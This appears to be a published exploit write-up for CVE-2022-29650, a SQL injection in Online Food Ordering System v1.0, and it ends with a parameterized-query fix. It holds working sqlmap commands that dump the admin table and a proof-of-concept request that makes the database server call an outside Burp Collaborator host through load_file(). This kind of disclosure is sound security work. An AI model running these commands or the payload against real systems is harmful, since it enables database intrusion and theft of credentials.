CVE-2022-29650: Online Food Ordering System Unauthenticated SQL Injection - HackMD
Online Food Ordering System v1.0 was discovered to contain a SQL injection vulnerability via the Search parameter at /online-food-order/food-search.php.
# Online Food Ordering System Unauthenticated SQL Injection

* Exploit Date: 4/18/2022
* Exploit Author: Nguyen Phu Hung (d4rkp0w4r)

# Exploit

* Injection Point => `Search`

![](https://i.imgur.com/7SaRKPz.jpg)

* Use Burp Suite to capture the request, then save it as `food.txt`

![](https://i.imgur.com/RxxNRAR.png)

* Use `Sqlmap` to enumerate the databases

```bash
python sqlmap.py -r food.txt -batch -current-db
```

![](https://i.imgur.com/Ajuhaeu.png)

```bash
python sqlmap.py -r food.txt -batch -D onlinefoodorder -tables
```

![](https://i.imgur.com/u0b1253.png)

```bash
python sqlmap.py -r food.txt -columns -D onlinefoodorder -T tbl_admin -dump
```

**Information Disclosure**

![](https://i.imgur.com/HcgSNbi.png)

# Vulnerable Code

![](https://i.imgur.com/CC9MvzY.png)

* The `search` value is passed into the database query without any filtering or parameterization

# POC

* Request

```http
POST /online-food-order/food-search.php HTTP/1.1
Host: 192.168.1.101:8888
Origin: http://192.168.1.101:8888
Cookie: PHPSESSID=g4piuq3kkuno5h981rkgb3njva
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.101:8888/online-food-order/foods.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 140

search=373255'%2b(select%20load_file('%5c%5c%5c%5cmsio14xruabfnv9ja1936c9phgn9b8zz2nuaky9.burpcollaborator.net%5c%5cqtq'))%2b'&submit=Search
```
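The fix the "Vulnerable Code" section implies, as an added example that is not the project's own source (which the page shows only as a screenshot): a hypothetical reconstruction of the unparameterized `search` query beside a prepared-statement version. The table and column names (`tbl_food`, `title`, `price`) and the `foodapp` database account are assumptions; `get_result()` requires the mysqlnd driver.

```php
<?php
// Hypothetical reconstruction of the vulnerable pattern (assumed, not the project's code):
// the untrusted POST value is concatenated straight into the SQL string, so a single
// quote in $search ends the literal and the rest of the input is parsed as SQL.
function searchFoodsVulnerable(mysqli $db, string $search): array
{
    $sql = "SELECT id, title, price FROM tbl_food WHERE title LIKE '%" . $search . "%'";
    $result = $db->query($sql);
    return $result ? $result->fetch_all(MYSQLI_ASSOC) : [];
}

// Hardened version: the value is sent as a bound parameter, separate from the query
// text, so the database never interprets it as SQL regardless of its content.
function searchFoodsSafe(mysqli $db, string $search): array
{
    $stmt = $db->prepare("SELECT id, title, price FROM tbl_food WHERE title LIKE ?");
    // Escape LIKE wildcards so user input cannot widen the match, then add our own.
    $pattern = '%' . addcslashes($search, '%_\\') . '%';
    $stmt->bind_param('s', $pattern);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// Defence in depth (run as the MySQL administrator, account name assumed): the web
// application's account should not hold the FILE privilege that load_file() depends on,
// and secure_file_priv should be set, so a future injection cannot read server files.
//   REVOKE FILE ON *.* FROM 'foodapp'@'localhost';
```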